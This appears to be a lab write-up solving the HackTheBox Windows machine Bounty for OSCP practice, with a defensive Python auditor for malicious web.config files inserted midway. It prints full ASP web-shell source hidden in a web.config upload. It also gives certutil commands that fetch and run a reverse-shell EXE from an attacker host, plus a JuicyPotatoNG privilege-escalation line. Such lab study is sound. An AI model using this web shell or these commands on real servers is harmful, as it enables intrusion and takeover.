OSCP Prep_0x45_HackTheBox Machine_Windows_Bounty

Ethan医生 · 2 weeks ago · Labs · 20



nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.246.227 (TCP scan)


gobuster dir -u http://10.129.246.227 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x txt,html,asp,aspx 


http://10.129.246.227//transfer.aspx



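Nothing can be uploaded, whether aspx or txt, so look it up on Google.

Searching Google for "IIS7.5 rce upload" and testing also showed that the .config extension is not restricted.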


https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/

https://gist.github.com/gazcbm/ea7206fbbad83f62080e0bbbeda77d9c


0x01 Exploitation

The web.config file

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!--
<% Response.write("-"&"->")%>
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objshell.exec(thecommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
<%Response.write("<!-"&"-") %>
-->


Browsing to the uploaded file is enough to execute commands.
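Seen from the defending side, the web.config above has four traits that a scan of an upload directory can flag. The following is an added example, not part of the original post; the function name, finding labels and both sample files are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET  # for untrusted files in production, prefer defusedxml

# Constructed sample with the same traits as the web.config above (ASP body trimmed).
SAMPLE_BAD = r'''<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\system32\inetsrv\asp.dll" />
    </handlers>
    <security><requestFiltering>
      <fileExtensions><remove fileExtension=".config" /></fileExtensions>
      <hiddenSegments><remove segment="web.config" /></hiddenSegments>
    </requestFiltering></security>
  </system.webServer>
</configuration>
<!-- <% Response.Write("x") %> -->
'''
# Constructed benign sample.
SAMPLE_OK = '''<configuration><system.webServer>
  <defaultDocument enabled="true" /></system.webServer></configuration>'''

def audit_web_config(text):
    """Return a sorted list of finding names for one web.config body (hypothetical helper)."""
    findings = set()
    # ASP delimiters do not belong in a config file. Check the raw text:
    # the XML parser drops comments, which is where the script is hidden.
    if re.search(r"<%.*?%>", text, re.S):
        findings.add("embedded-asp-script")
    try:
        root = ET.fromstring(text.encode("utf-8"))
    except ET.ParseError:
        return sorted(findings | {"unparseable-xml"})
    for add in root.iter("add"):
        path = add.get("path", "").lower()
        target = (add.get("modules", "") + " " + add.get("scriptProcessor", "")).lower()
        # A handler that routes *.config requests to a script engine.
        if path.endswith(".config") and ("isapimodule" in target or "asp.dll" in target):
            findings.add("config-mapped-to-script-handler")
    for rem in root.iter("remove"):
        # Request filtering normally blocks .config requests and the web.config segment.
        if rem.get("fileExtension", "").lower() == ".config":
            findings.add("request-filter-config-extension-removed")
        if rem.get("segment", "").lower() == "web.config":
            findings.add("hidden-segment-web.config-removed")
    return sorted(findings)

if __name__ == "__main__":
    for name, body in (("bad", SAMPLE_BAD), ("ok", SAMPLE_OK)):
        print(name, audit_web_config(body))
```

Any single finding on a file inside a user-writable web directory is worth an alert; the upload form itself should accept extensions from an allowlist rather than block a list that omits .config.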





Generate an EXE with MSF and upload it

certutil -urlcache -split -f http://10.10.16.43:8000/shell_5555.exe C:\users\public\shell.exe && C:\users\public\shell.exe



Privilege escalation

certutil.exe -urlcache -split -f http://10.10.16.43:8000/shell_6666.exe c:\users\public\priv.exe


JuicyPotatoNG.exe -l 6667 -p c:\Users\Public\priv.exe -t * -c {2b72133b-3f5b-4602-8952-803546ce3344}

Use potato to escalate privileges

Tags: OSCP
